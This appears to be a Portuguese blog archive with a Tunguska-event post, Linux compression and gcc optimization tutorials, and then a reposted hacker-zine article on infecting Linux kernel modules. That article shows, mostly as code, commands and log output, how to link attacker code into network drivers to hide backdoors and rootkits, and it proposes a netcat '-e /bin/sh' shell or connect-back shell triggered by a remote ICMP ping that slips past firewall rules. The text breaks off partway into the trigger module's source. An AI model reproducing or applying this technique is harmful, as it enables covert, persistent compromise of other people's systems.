Cientistas acreditam que o evento tenha sido causado pela desintegração de um cometa ou asteróide a uma altitude de 5 km a 10 km na atmosfera, mas nenhum fragmento ou vestígio do corpo jamais foi encontrado, o que fez do evento um tema popular entre aficionados de óvnis. Tunguska também aparece em diversas obras de ficção, de um romance de Thomas Pynchon ao seriado de TV Arquivo X.
Agora, em artigo na revista online Terra Nova, pesquisadores liderados por Luca Gasperini, da Universidade de Bolonha, sugerem que o Lago Cheko, 8 km ao norte do provável epicentro do evento, pode ser a cratera aberta por um pedaço do corpo responsável pela explosão no ar.
Sondagens realizadas no lago pelos cientistas italianos durante uma expedição em 1999, descritas no artigo, sugerem que o lago preenche uma cratera aberta por um impacto. O trabalho dos pesquisadores, ressaltando que a região é remota e pouco habitada, diz que não se sabe se o Cheko já existia antes de 1908, e que sua primeira citação em mapas data de 1928.
Com base nas características do lago, a equipe de Gasperini sugere que a cratera foi aberta por um asteróide de 1.500 toneladas e 10 metros de diâmetro – no máximo: o terreno é pantanoso, e a cratera pode ter se expandido, com o desgaste do solo ao redor da borda original.
Os cientistas reconhecem, no entanto, que será necessário realizar uma perfuração no leito do lago para determinar se se trata realmente de uma cratera de asteróide, com a descoberta de um fragmento do meteorito original ou de solo compactado pelo impacto.”

Fonte

Bom é isso galera tirem suas conclusões sobre oque realmente aconteceu em tunguska.

Recomendo leitura dos seguintes artigos:

Sibéria 1908

Lago pode explicar mistério do OVNI de 1908 na Sibéria

Tunguska event

Revista Galilleu 1999 edição de Janeiro.

[]’s

Compactação de arquivos no Linux

VonNaturAustreVe — Fri, 20 Jun 2008 16:56:34 +0000

Compactação de arquivos no Linux

Introdução

Os iniciantes no Linux podem ficar um pouco confusos devido a grande variedade de extensões existentes dos arquivos compactados. Essa confusão pode surgir principalmente quando alguém baixa um arquivo e não sabe que comando usar para extraí-lo.

Vou me esforçar para esclarecer um pouco esse assunto com o objetivo de fornecer alguma ajuda para quem está começando a experimentar o Linux.

Pode parecer um pouco complicado no início, mas esse artigo resume bem praticamente tudo o que você precisa saber sobre compactação de arquivos no Linux. Se ler o artigo com atenção, não importa que formato você encontre, você saberá o que fazer sem precisar ficar buscando ajuda.

Caso não saiba o que é compressão (ou compactação) de arquivos, aí vai uma explicação rápida:

Compressão significa reunir um ou mais arquivos, usando algum programa que irá eliminar as redundâncias de dados desses arquivos, fazendo com que eles ocupem menos espaço. Ao invés de ter vários arquivos, você pode ter um só arquivo comprimido que inclui muitos. Um arquivo comprimido possui extensões que o identificam, por exemplo: .gz e .zip.

TAR – Armazenando vários em um

TAR (Tape ARchive) é um formato muito usado para armazenar vários arquivos em um. Esse processo é chamado de arquivamento.

Para armazenar vários arquivos em um, use um comando, por exemplo:

$ tar -cf nomedoarquivo.tar arquivo1 arquivo2 arquivo3

Este comando combina arquivo1, arquivo2 e arquivo3 e armazena-os em nomedoarquivo.tar. O parâmetro -c indica que queremos criar um arquivo e o parâmetro -f indica que estamos manipulando arquivos.

E para extrair esses arquivos?

Use o comando:

$ tar -xf nomedoarquivo.tar

Para extrair todos os arquivos de nomedoarquivo.tar no diretório atual.

Caso ache difícil lembrar os parâmetros, aqui vai algumas dicas:

-c lembra criar
-f lembra “Files” (arquivos em inglês)
-x lembra eXtrair

Compactação de arquivos

No Linux, bz e gz são formatos comuns de compressão. Normalmente você usa o utilitário bzip2 para criar arquivos bz e o gzip para criar arquivos gz. O bzip é capaz de comprimir mais que o gzip, porém consome mais memória no processo.

Para comprimir um arquivo usando o gzip, use o comando:

$ gzip nomedoarquivo

O resultado é um arquivo chamado nomedoarquivo.gz. Por exemplo, o comando:

$ gzip imagem.jpg

Irá criar o arquivo comprimido imagem.jpg.gz.

Porém, uma observação: ele não irá apenas criar o arquivo gz, mas também irá substituir o arquivo original pelo arquivo comprimido.

Para descompactar o arquivo, use o comando:

$ gunzip nomedoarquivo.gz

Ou então o comando:

$ gzip -d nomedoarquivo.gz

Comprimir com o bzip2 é semelhante ao gzip. Basta usar o comando:

$ bzip2 nomedoarquivo

Assim como o gzip, o bzip2 também substitui o arquivo original pelo arquivo comprimido.

Para descompactar um arquivo bz, você pode usar o comando:

$ bzip2 -d nomedoarquivo.bz2

Ou então:

$ bunzip2 nomedoarquivo.bz2

Como o processo de utilização do gzip e do bzip2 são semelhantes, fica fácil aprender os dois. Basta praticar com algum arquivo, duas ou três vezes para pegar o jeito.

Você também pode usar o utilitário zip para compactar arquivos. O que pode ser bem útil se você quiser compartilhar arquivos com pessoas que não usam Linux. Para compactar arquivos com o zip, use um comando:

$ zip arquivos.zip arquivo1 arquivo2 arquivo3

Esse comando irá não só comprimir os arquivos (arquivo1, arquivo2 e arquivo3), mas irá armazená-los num arquivo chamado arquivos.zip. Ou seja, além de comprimir, ele arquiva.

Para extrair arquivos zip, use o comando:

$ unzip arquivos.zip

Compactando arquivos tar

Lembre-se que o TAR não comprime, ele apenas arquiva. Já o ZIP comprime e também arquiva.

Isso quer dizer que depois que você criar um arquivo tar, seu tamanho é o mesmo que o tamanho da soma dos arquivos originais.

Para reduzir o tamanho de um arquivo tar, você precisa compactá-lo com gzip ou bzip2:

Exemplo:

$ tar arquivos.tar arquivo1 arquivo2 arquivo3
$ gzip arquivos.tar

O primeiro comando irá arquivar os arquivos (arquivo1, arquivo2 e arquivo3) em um arquivo chamado arquivos.tar.

O segundo comando irá comprimir o arquivo.tar e o substituirá por arquivos.tar.gz. Você também pode usar o bzip para compactar arquivos tar.

Como se extrai arquivos a partir de um arquivo tar compactado? Use o comando:

$ tar -zxvf arquivos.tar.gz

Para extrair todos os arquivos gzip a partir de um arquivo tar compactado. O parâmetro -z informa que o arquivo tar foi comprimido usando o gzip.

E se o arquivo tar foi comprimido com bzip? Nesse caso o comando é outro, na verdade o que muda em relação ao comando anterior é uma letra: ao invés de usar -z use -j, por exemplo, para descompactar um arquivo tar que foi comprimido com o bzip:

$ tar -jxvf arquivos.bz2

Você pode ainda encontrar arquivos tar compactados com tgz e tbz2. Estes formatos na verdade são os mesmos de tar.gz e tar.bz2, respectivamente.

Bem, é isso.

Caso perceba algum erro, por favor, me corrija. Também aceito críticas construtivas e informações complementares.

Obrigado pela atenção.

Fonte

Autor:Xerxes Lins

Otimização de Executáveis com o gcc

VonNaturAustreVe — Fri, 20 Jun 2008 05:53:21 +0000

Otimização de Executáveis com o gcc,explicações e definições.

Recentemente um amigo me perguntou sobre “como eu faço para deixar um executável mais rápido no Linux” ,isso me intrigou,não conhecia muito sobre isso então comecei-a pesquisar mais sobre a otimização de executáveis ,encontrei muitas informações é irei apresenta-la em um tutorial,para ficarem mais claras.

O GCC é o melhor compilador que existe(sem duvida nenhuma),ele é composto por ferramentas de compilação,assembler e de linkagem,sua função é produzir executáveis prontos parar “rodar” em um formato aceito pelo SO(as formas de execução é a estrutura de um binário variam de acordo com o SO),o seu modo de operação se divide em 4(quatro) etapas,em geral executadas em seqüência e automaticamente pelo compilador:

Preprocessamento:Nesta etapa ocorre a produção do código que já não possui diretivas,coisas como “#if” não podem ser entendidos diretamente pelo compilador,portanto,será traduzida para o código da maquina.

Compilação:passo em que o compilador traduz o programa em texto para um arquivo objeto,o qual contém todas as referências de códigos e bibliotecas utilizadas.
Assembler:Aceita os assembly mnemônicos é produz o código contendo opcodes.É comum o equivocos causados pelo compilador,como não produzir os opcodes,o estágio de assembler “limpa sujeira” causa pelo compilador.
Linkagem:nome adaptado do inglês,linking,que transforma um arquivo objeto em executável,preenchendo todas as referências e gerando o código completo.

Agora que conhecemos um pouco mais sobre o funcionamento do GCC(recomendo o bom é velho man gcc,para mais informações),vamos ao oque interessa,as otimizações do executável.

Obs:É importante verificar a sua versão do gcc,pois nem todas as flags do gcc 3.x funcionam no gcc 2.x,então é importante saber as flags que a sua versão do gcc suporta.

Para saber a versão de GCC, digite:

$ gcc --version ou gcc -v

Para saber informação sobre o processador:

$ cat /proc/cpuinfo

Agora com as informações sobre o processador é a versão do gcc podemos dar continuidade.

O que são CFLAGS?

CFLAGS são flags do compilador C, geralmente opções do GCC (GNU Compiler Collection). CFLAGS podem ser usadas para customizar e otimizar aplicações quando você as constrói pelos fontes. (Esta é uma importante característica de algumas distribuições,como o gentoo ,já que a maioria dos pacotes são instalados a partir do código-fonte nestes).CFLAGS são geralmente usadas para especificar a arquitetura de seu computador, bem como o tipo de CPU usada e qualquer outra opção especial que se queira habilitar ou desabilitar. Esta informação é importante para o GCC diz a ele exatamente como customizar as instruções de montagem que ele cria através do código-fonte da aplicação. Tecnicamente o GCC pode rodar sem nenhuma CFLAG, já que são opções extra.

Otimizações Básicas (seguras)

Existem diversas opções de otimização básicas consideradas seguras para o uso geral. A primeira delas é -O (letra, não número). Para ver exatamente quais flags de otimização são habilitadas a cada um dos níveis de otimização, bem como uma lista de outras otimizações que podem ser habilitadas, por favor leia a man page do GCC.

-O

-O liga algumas otimizações básicas que não causam grande impacto na velocidade de compilação, e vão aumentar consideravelmente a velocidade do seu sistema. Apesar que não há muita razão para usar -O ao invés de -O2.

-O2

-O2 liga todas as otimizações de -O e todas as outras otimizações que não aumentam muito o tamanho dos binários gerados ou interferem no debugging. -O2 é ainda melhor que -O, e geralmente tão seguro quanto. Este é o nível de otimização mais usado para pacotes e distribuições no mundo Linux e para o kernel Linux. Se você quer um sistema que “apenas funcione”, -O2 provavelmente é bom pra você.

-O3

-O3 liga todas as otimizações de -O2 e ainda algumas otimizações que aumentam o tamanho dos binários gerados além de tornar o debugging mais difícil ou até mesmo impossível. Usar -O3 como deu nível default de otimização pode ser uma má idéia.

-O3 é o nível de otimização mais alto e possivelmente torna o código mais rápido mas as aplicações que se beneficiam disto são muito poucas, geralmente decoders de vídeo e imagem e coisas do tipo. Entretando, os efeitos colaterais, como binários maiores, afetam tudo. Binários maiores ocupam mais memória, carregam mais devagar, causam mais I/O de disco, etc. Então compilar um sistema com -O3 vai ter o efeito de poucas aplicações rodando ligeiramente mais rápidas ao custo do resto do sistema rodando ligeiramente mais devagar e se tornando menos responsivo.

O Linux armazena regularmente programas e arquivos na RAM (este é a parte “cache” quando você executa free -m ), então os programas podem precisar carregar do disco rígido apenas uma vez (dependendo do programa e computador usado). Portanto este é menos um problema em sistemas com grande quantidade de RAM. Um sistema com grande quantidade de cache de CPU também ajuda já que se ajusta melhor a binários maiores, então você acaba notando maior velocidade neles. Então, se você tem um sistema topo-de-linha, você sofrerá menos de problemas associados com -O3.

-Os

-Os otimiza para tamanho. -Os habilita todas as otimizações de -O2 que geralmente não aumentam o tamanho do código e executa ainda mais otimizações desenvolvidas para reduzir o tamanho do código.

-Os é muito útil para aplicações grandes, como o Firefox,KDE,openoffice, já que vai reduzir o tempo de carregamento, uso de memória e cache, uso de disco etc. Código compilado com -Os pode ser mais rápido que com -O2 ou -O3 por causa disso. Também é recomendado para computadores velhos com pouca quantidade de RAM, espaço em disco ou cache de CPU. Mas esteja avisado que -Os não está tão bem testado quanto -O2 e pode levar a bugs de compilação.

Note que apenas uma das flags acima pode ser escolhida. Se você escolher mais de uma, só a última especificada terá efeito.

-fomit-frame-pointer

-fomit-frame-pointer diz ao gcc para omitir frame pointers, liberando um registrador adicional na CPU. Isto é principalmente útil em x86 já que a maioria das arquiteturas, como AMD64, tem isso por default em -O2 ou superior, apesar de o tamanho dos binários poder aumentar ligeiramente. Esta flag quebra o debugging em x86 e possivelmente outras arquiteturas a menos que você compile com gcc 4.x e a flag -fvar-tracking.

Glibc tem uma flag USE: glibc-omitfp. Isto faz a glibc usar -fomit-frame-pointer e algumas outras otimizações para o pacote quando for seguro. Para ler mais sobre otimizar a glibc tente este HOWTO

-march=

-march dis ao gcc para otimizar para uma certa arquitetura. Basicamente, você apenas precisa saber qual é a sua CPU, e o código GCC para ela. Lembre-se de que esta flag quebra compatibilidade com outras arquiteturas!

Esta flag toma a seguinte forma:

-march=pentium4

Obviamente você substituirá pentium4 pelo código correspondente.

Aqui segue uma lista incompleta de arquiteturas x86 válidas que podem ser usadas com a flag -march:

i386, i486, i586, i686, pentium, pentium-mmx, pentiumpro, pentium2, pentium3, pentium-m, pentium4, prescott, k6, k6-2, k6-3, k8, athlon, athlon-tbird, athlon-4, athlon-xp, athlon-mp, athlon64, opteron, winchip-c6, winchip2, c3.

Caso esteja usando o gcc 4.2 é mais facil e provavelmente(caso não saiba qual a flag mais aproprida) usar:

-march=native

Com isso o gcc ira auto-detectar

Cheque o gcc manual para um alista completa (em Hardware Models and Configurations).

Note: “-march” implica “-mtune” (veja a man page do gcc).

-mtune=/-mcpu=

-mtune, ou -mcpu em versões antigas do GCC, é similar ao -march e aceita as mesmas opções. Diferente de -march ele não quebra compatibilidde com outras arquiteturas. As opções de -march e -mtune/-mcpu podem ser misturadas para alcançar o efeito desejado. Se você não vai compartilhar seus binários com outros computadores você não precisa desta flag e deve utilizar apenas uma flag -march apropriada. As exceções são arquiteturas como PPC onde -march não está disponível. Veja o Guia de CFLAGs Seguras para mais informações.

Documentação do GCC sobre -march e -mcpu/-mtune

-pipe

A última e mais comum flag é a opção ‘-pipe’. A opção pipe diz ao GCC para não criar arquivos temporários quando compilando, e ao invés disso canalizar (pipe) dados diretamente para a próxima função, o que salva algum tempo de compilação. Esteja avisado que usar -pipe vai fazer o GCC usar mais RAM então não use se isto se você tiver pouca.

CFLAGS comuns para desenvolvedores

-Wall: Isto habilita todos os avisos sobre construções que alguns usuários consideram questionáveis, e que são fáceis de evitar (ou modificar para prevenir o aviso), mesmo em conjunção com macros.
-Wextra: Imprime avisos extras
-Werror: Transforma avisos em erros, e então o GCC irá interromper a compilação após o aviso (porque se tornou um erro).
-ggdb: Inclui toda a informação de debugging possível no binário gerado que é útil para gdb.

Segue abaixo uma tabela com as diferenças técnicas entre O1,O2,O3.

Agora sinta-se a vontade para testar as otimizações.

Fontes:

http://docs.freebsd.org/info//gcc/gcc.info.Optimize_Options.html

http://www.linuxjournal.com/article/7269

http://psydesk.blogspot.com/2007/01/cflag-otimizando-sua-compilao-no-linux.html

http://www.bestlinux.com.br/index.php?option=com_content&task=view&id=1674&Itemid=127&limit=1&limitstart=0

http://gentoo-wiki.com/Safe_Cflags#Safe_CFLAGS_to_use_for_Gentoo

http://www.700km.com.br/mundobizarro/gccopt.php

http://www.onlamp.com/pub/a/onlamp/2007/04/03/getting-familiar-with-gcc-parameters.html

[]’s

LKM Code Injection

VonNaturAustreVe — Thu, 19 Jun 2008 23:40:38 +0000

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-[04]-=[LKM Code Injection]=-|tDs|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

–=[ Introducao

Melhor que conseguir elevar privilegios em um sistema e deixar um LKM
nosso, com backdoors, rootkits, ou o que for, e’ colocar isso tudo em um LKM do
sistema. Desta forma, a deteccao de rastros de uma intrusao fica um pouco mais
dificil.

Neste pequeno texto, veremos de maneira clara (eu espero) como podemos
infectar um LKM, adicionando mais funcoes ou modificando-as, da maneira que
acharmos uteis ao nossos objetivos.

O assunto pode parecer um pouco complexo para iniciantes, entretanto o
que e’ tratado e’ somente o basico. Entao, se ja possui um conhecimento do as-
sunto, e’ mais proveitoso procurar por algo mais avancado para leitura. Conhe-
cimento previo sobre a escrita de LKM e bem-vindo, embora nao seja indispensa-
vel. Exemplos e citacoes sao feitos tendo em mente o kernel do GNU/linux,
2.4.x.

–=[ O que sao LKMs

LKMs sao “pedacos” do kernel, que podem ser carregados e descarregados
dinamicamente, aumentando (ou diminuindo) a gama de opcoes e funcionalidades que
sao disponibilizadas pelo kernel do sistema. Por ser carregado sob demanda, ou
seja, nao esta embutido no proprio kernel, LKMs tem diversas vantagens a codigo
escritos diretamente no kernel. Entre elas temos:

- Economia de memoria: Pelo fato de ser carregada somente quando necessario,
nao existe desperdicio de memoria com funcoes que nao sao utilizadas constan-
temente;
- Facilidade na compilacao e debug: LKMs apos carregadas sao parte do kernel,
entretanto nao precisam ser compiladas junto com ele. Podem ser escritos e
compilados a qualquer momento. Quando se tem problemas com o codigo, e’ possi-
vel fazer um debug dele com facilidade muito maior do que se o codigo estives-
se embutido no kernel. E’ mais rapido descarregar o modulo, modificar o codigo,
recompilar e recarregar o modulo do que reescrever a parte do codigo que esta
no kernel, recompilar tudo e reiniciar o computador!
- Novos drivers podem ser testados sem precisar reiniciar o sistema. E sao em
drivers que iremos nos concentrar.

–=[ Inicio – Primeiros Exemplos

A forma mais simples de entender como funciona e’ com exemplos. Inicial-
mente, criamos um modulo chamado driver_original.o, que sera o exemplo usado
como modulo do sistema, que futuramente sera infectado:

<++> lkm_injection/driver_original.c
/*
 * Simples exemplo de um lkm que nao faz nada,
 * mas poderia ser, por exemplo, um driver de
 * uma placa de rede.
 * Compile com $gcc -O3 -c driver_original.c
*/

#define MODULE
#define __KERNEL__

#include 
#include 

static int __init inicio(void)
{
  printk ("<1> Iniciando driver_original \n");
  printk ("<1> Executando funcoes iniciais\n");   
  printk ("<1> Modulo carregado e aguardando chamada a suas funcoes\n\n");
  return 0;
}

static void __exit fim(void)
{
  printk ("<1> Finalizando modulo orignal \n");
}

module_init(inicio);
module_exit(fim);
MODULE_LICENSE("GPL");
<--> lkm_injection/driver_original.c

Antes de carregar o modulo, e’ interessante ter o syslogd funcionando
corretamente e com a seguinte linha no seu arquivo de configuracao (normalmente
/etc/syslog.conf):

    kern.alert   /var/log/alert

Dessa forma poderemos observar melhor as mensagens que serao emitidas pelo mo-
dulo. Apos isso, compile o codigo e carregue o modulo:

    #gcc -O3 -c driver_original.c
    #insmod driver_original.o

As opcoes passadas para o gcc sao:

|| -O3: Optimize yet more. -O3 turns on all optimizations specified
|| by -O2 and also turns on the -finline-functions and -frename-registers
|| options. (E’ uma opcao para otimizacao do objeto criado pelo gcc.).
||
|| -c: Compile or assemble the source files, but do not link. The linking
|| stage simply is not done. The ultimate output is in the form of an object
|| file for each source file.

As seguintes mensagens devem aparecer em ‘/var/log/alert’ (ou nao, elas
ainda podem aparecer em outro arquivo de log, sinistramente):

Nov 14 17:24:57 matrix kernel: Iniciando driver_original
Nov 14 17:24:57 matrix kernel: Executando funcoes iniciais
Nov 14 17:24:57 matrix kernel: Modulo carregado e aguardando chamada a
suas funcoes

Com o driver (pseudo-driver que faz absolutamente nada mais do que exi-
bir mensagens) criado, podemos agora criar o modulo que contem o codigo que se-
ra injetado no driver_original.o:

<++> lkm_injection/infector.c
/*
 * Simples exemplo de modulo (note que tem apenas a funcao init_module, ou
 * seja, so executa alguma funcao durante o carregamento dele), que sera
 * utilizado para ser injetado em um outro modulo.
*/

#define MODULE
#define __KERNEL__

#include 
#include 

int init_module(void)
{
  printk ("<1> Iniciando funcoes do modulo injetado\n");
  return 0;
}
<-->lkm_injection/infector.c

Observe que o modulo anterior possui apenas uma funcao, a init_module.
Essa funcao e’ a equivalente a “main()” em um programa em C comum, ou seja, e’
a primeira funcao a ser executada na execucao do modulo, que no caso e’ o car-
regamento dele. Como deve imaginar, existe tambem uma funcao executada logo an-
tes do descarregamento do modulo. Essa funcao e’ a “cleanup_module()”.

Compile o codigo e carregue o modulo:

    #gcc -O3 -c infector.c
    #insmod infector.o

A seguinte mensagem deve aparecer em ‘/var/log/alert’:

Nov 14 17:36:29 matrix kernel: Iniciando funcoes do modulo injetado

Por enquanto, tudo que temos sao dois modulos separados (note que a uni-
ca coisa que os modulos estao fazendo ate agora e’ exibir mensagens no arquivo
de log. Leve em conta o seguinte:

- As funcoes do driver_original.o ja existem, como codigo do modulo do sistema
que futuramente sera infectado. Poderiamos estar usando como exemplos o codigo
de um driver real, mas isso apenas complicaria de forma desnecessaria a explana-
cao de como podemos efetuar a infeccao;
- As nossas funcoes – backdoors, rootkits, etc – serao adicionadas em breve
(por voce, obvio, apenas sera mostrado que e’ possivel fazer e como poderia
ser feito).

Voltando ao que vale, o que precisamos fazer agora, e’ injetar o modulo
infector.o dentro do modulo driver_original.o. Para isso, podemos utilizar o
GNU Linker (ld):

||    “ld combines a number of object and archive files,
||    relocates their data and ties up symbol references.
||    Usually the last step in compiling a program is to run
||    ld.”

Para injetar o codigo do infector.o dentro do driver_original.o, podemos
fazer da seguinte forma:

    #ld -r -z muldefs infector.o driver_original.o -o devil.o

Basicamente o que e’ feito aqui e’ uma injecao da funcao ‘int init_modu-
le(void)’ (a unica) do modulo infector.o para o modulo driver_original.o, crian-
do um novo modulo, chamado devil.o. O codigo do driver_original.o deve ter fica-
do parecido com o seguinte:

/** driver_original_infectado */
#define MODULE
#define __KERNEL__

#include 
#include 

static int __init inicio(void)
{
  printk ("<1> Iniciando driver_original \n");
  printk ("<1> Executando funcoes iniciais\n");   
  printk ("<1> Modulo carregado e aguardando chamada a suas funcoes\n\n");
  return 0;
}

static void __exit fim(void)
{
  printk ("<1> Finalizando modulo orignal \n");
}

module_init(inicio);
module_exit(fim);
MODULE_LICENSE("GPL");

int init_module(void)
{
  printk ("<1> Iniciando funcoes do modulo injetado\n");
  return 0;
}
/** fim de driver_original_infectado */

Apos carregar ele (#insmod devil.o), o seguinte e’ visto em ‘/var/log/alert’:

Nov 14 18:34:42 matrix kernel: Iniciando funcoes do modulo injetado

Esta funcionando, mas nao perfeitamente, ainda. Alguns detalhes devem
ser observados. Um pouco de teoria:

Em um LKM, a primeira funcao a ser executada e’ a init_module() OU algu-
ma funcao passada como argumento para a macro module_init() (que no caso do
driver_original.c, foi a funcao ‘inicio’). A macro module_init() esta declarada
em ‘/usr/src/linux/include/linux/init.h’:

|| /**
||  * module_init() - driver initialization entry point
||  * @x: function to be run at kernel boot time or module insertion
||  *
||  * module_init() will add the driver initialization routine in
||  * the "__initcall.int" code segment if the driver is checked as
||  * "y" or static, or else it will wrap the driver initialization
||  * routine with init_module() which is used by insmod and
||  * modprobe when the driver is used as a module.
|| */
|| #define module_init(x)  __initcall(x);

Se observar, vera que no codigo teria tanto a funcao “module_init” quanto
a “init_module”. Entao, caso o codigo acima fosse compilado, ocorreria um erro:

    error: redefinition of `init_module'
    error: `init_module' previously defined here

O mesmo ocorreria se eles fossem compilados separados e posteriomente
linkados. Para contornar este problema, compilamos os arquivos separadamentes e
linkamos, passando o argumento ‘-z muldefs’ para o ld, informando a ele para
aceitar definicoes multiplas de uma mesma funcao. Desta forma podemos substituir
(sobreescrever) a funcao ‘module_init(inicio)’, que inicializa o driver_original
.o, pela funcao init_module() do modulo infector.o.

Dessa forma teriamos o nosso modulo injetado dentro do modulo que esta-
mos tentando infectar. So tem um detalhe: A funcao ‘module_init(inicio)’ que se-
ra sobreescrita contem codigo que pode ser essencial para o modulo, em sua ver-
sao nao infectada (aqui o codigo original apenas exibe mensagens, mas normalmen-
te nao e’ apenas isso que ocorre), e deve continuar sendo executado. Para que
tudo funcione corretamente, basta que o modulo infector.o, em sua inicializacao,
execute uma chamada para a funcao inicio() do modulo driver_original.o.
Complicou? Observe:

<++> lkm_injection/infector2.c
/*
 * Simples exemplo de modulo (note que tem apenas a funcao init_module, ou
 * seja, so executa alguma funcao durante o carregamento dele), que sera
 * utilizado para ser injetado em um outro modulo. Apos carregado, executa funcao
 * principal do modulo infectado
 */
#define MODULE
#define __KERNEL__

#include 
#include 

int init_module(void)
{
  printk ("<1> Iniciando funcoes do modulo injetado\n");
  printk ("<1> ***inicializando modulo original*** \n\n");
  inicio (); // funcao inicio do driver_original, chamada para
             // inicializacao dele
  return 0;
}
<--> lkm_injection/infector2.c

Compilamos o novo modulo e linkamos com o modulo original, criando um outro
modulo, chamado devil.o:

    # gcc -O3 -c infector2.c
    # ld -r -z muldefs infector2.o driver_original.o -o devil.o

Apos carregar o modulo (#rmmod devil; insmod devil.o), vemos o seguinte em
‘/var/log/alert’:

Nov 14 18:39:24 matrix kernel: Iniciando funcoes do modulo injetado
Nov 14 18:39:24 matrix kernel: ***inicializando modulo original***
Nov 14 18:39:24 matrix kernel: Iniciando driver_original
Nov 14 18:39:24 matrix kernel: Executando funcoes iniciais
Nov 14 18:39:24 matrix kernel: Modulo carregado e aguardando chamada a
suas funcoes

Exatamente o que e’ necessario:
- Nosso modulo e’ executado, fazendo o que precisa;
- Nosso modulo chama a funcao original do modulo que foi infectado;
- Modulo original funciona normalmente, como se nada tivesse acontecido.
So precisamos de algum codigo util para ser executado e algum modulo para
servir de hospedeiro!

–=[ Localizando o Hospedeiro

Como dito anteriormente, a primeira funcao a ser executada em um modulo
pode ser tanto module_init(FUNCAO), quanto init_module(). No caso da infeccao
de um modulo que seja inicializado por module_init(FUNCAO), so precisamos nos
certificar que o codigo que infectou o modulo original faca uma chamada para
‘FUNCAO’, garantindo assim que tudo que deve ser executado por ele ao ser car-
regado realmente sera executado. Agora, no caso da infeccao de um modulo que e’
inicializado por init_module(), a situacao e’ diferente. E’ necessario literal-
mente reescrever o init_module() do modulo original dentro do modulo que ira
causar a infeccao. Isto pode ser um tanto chato de se fazer, dependendo do
tamanho da funcao de inicializacao. Por este simples motivo, sera dado preferen-
cia aos modulos que sejam inicializados por module_init(FUNCAO).

Decidir qual modulo utilizar nao deve ser uma tarefa muito complicada.
Vamos levar em consideracao o seguinte:

- Para que possamos acessar uma maquina remota, ela obviamente esta conectada
a rede atraves de algum dispositivo, que normalmente e’ uma interface de rede
(ethernet);
- Para que a interface de rede possa ser utilizada, e’ necessaria a utilizacao
de algum tipo de driver;
- A maioria das distribuicoes de linux atualmente, colocam os drivers de
interfaces de rede como modulos;

Com estas informacoes, conclui-se que e’ bastante interessante a infec-
cao de um driver de interface de rede (se a maquina nao carregar este modulo a
cada inicializacao do sistema, ela nao tera acesso a rede e nos nao teremos
acesso a ela de qualquer forma, por isso a escolha).

Outro detalhe que vale observar e’ que muitas maquinas costumam utilizar
placas de rede comuns (realtek, sis900, 3com), assim utilizam os mesmos modulos
(sistemas diferentes utilizando modulos iguais), o que facilitaria bastante a
escrita de nosso codigo de infeccao. Vamos dar uma observada no codigo destes
modulos controladores de dispositivos de rede:

|| /** realtek 8139 */
|| /*
||   8139too.c: A RealTek RTL-8139 Fast Ethernet driver for Linux.
||    Maintained by Jeff Garzik 
||   Copyright 2000-2002 Jeff Garzik
|| */
|| ...
|| muito codigo
|| ...
|| module_init(rtl8139_init_module);
|| module_exit(rtl8139_cleanup_module);
|| /** fim de realtek 8139 */

|| /** sis900 */
|| /* sis900.c: A SiS 900/7016 PCI Fast Ethernet driver for Linux.
||    Copyright 1999 Silicon Integrated System Corporation
||    Revision: 1.08.06 Sep. 24 2002
||       
||    Modified from the driver which is originally written by Donald Becker.
|| */
|| ...
|| muito codigo
|| ...
|| module_init(sis900_init_module);
|| module_exit(sis900_cleanup_module);
|| /** fim de sis900 */

|| /** ne2k */
|| /* ne2k-pci.c: A NE2000 clone on PCI bus driver for Linux. */
|| /*
||  A Linux device driver for PCI NE2000 clones.
|| */
|| ...
|| muito codigo
|| ...
|| module_init(ne2k_pci_init);
|| module_exit(ne2k_pci_cleanup);
|| /** ne2k */

O codigo completo dos arquivos esta em ‘/usr/src/linux/drivers/net’.
Nota alguma semelhanca entre o codigo desses drivers e o codigo do
“driver_original.c”? Observa-se que muitos destes drivers estao codificados de
forma a facilitar o nosso trabalho. Tendo entao alguns hospedeiros selecionados,
vamos juntar alguns codigos interessantes para injetar neles.

–=[ Colocando Algum Codigo Util

Agora que ja sabemos como fazer, precisamos decidir o que fazer. Algumas
ideias:

- Uma backdoor;
- Um logcleanner;
- Um rootkit;
- Um sninffer;
- Qualquer coisa que voce tiver ideia! Voce esta no comando.

Com as ferramentas em maos, vamos ver uma pseudo-implementacao de algum
codigo realmente util. O codigo a seguir e’ uma LKM que contem um codigo inofen-
sivo, ate que o kernel manipule um pacote ICMP de 50 bytes (em outras palavras,
o codigo nocivo da LKM e’ ativado por um PING remoto de 50 bytes, que pode ser
feito assim: $ping -s 22 ip.da.vitima). Isso e’ feito com a criacao de um hook
no netfilter, que e’ adicionado antes de outras possiveis regras que poderiam
ter sido criadas para bloquear pacotes ICMP, ou seja, voce pode com isso passar
por um conjunto de regras que tornaria a vitima inacessivel. E mais, voce pode
criar regras on-the-fly, para permitir que a maquina que enviou o pacote ICMP
tenha acesso irrestrito. Resumindo, voce pode inutilizar as regras que tenham
sido criadas.

Para execucao, e’ possivel colocar o que quiser: uma backdoor (que tal
executar o netcat ouvindo em uma porta X e passar a opcao “-e /bin/sh” para ele?
Uma root shell sem muito esforco), uma backdoor em connect-back (que tal esse
mesmo netcat se conectar no ip de quem enviou o pacote ICMP), desativar o syslo-
gd enquanto o ip de quem enviou o pacote ICMP estiver se comunicando com a ma-
quina, etc. Observe que, se receber 50 pacotes do tamanho especifico, o codigo
nocivo sera executado 50 vezes, o que nao sera bom na maioria dos casos. No
exemplo, apenas exibe uma mensagem, entao nao teremos problemas. Tenha isso em
mente no momento que for implementar algo e controle a execucao do codigo noci-
vo. Segue a implementacao:

<++> lkm_injection/injekt.c
/*
 * Implementacao de lkm com codigo nocivo ativado remotamente,
 * atraves do recebimento de um pacote ICMP de 50 bytes, que pode
 * ser alterado passando o parametro pkt_size:
 * #insmod injekt.o pkt_size=100
 *
 */
#define __KERNEL__
#define MODULE

#define P_SIZE_OFFSET 28

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* declaracoes de variaveis e prototipo de funcoes  */
int exec_injetk(void);
unsigned int pkt_size = 22;
struct nf_hook_ops nfh;
unsigned int i_ll_hook_you(unsigned int hooknum,
                            struct sk_buff **skb,
                            const struct net_device *in,
                            const struct net_device *out,
                            int (*okfn)(struct sk_buff*));

/* funcao principal do modulo */
int __init init_injekt()
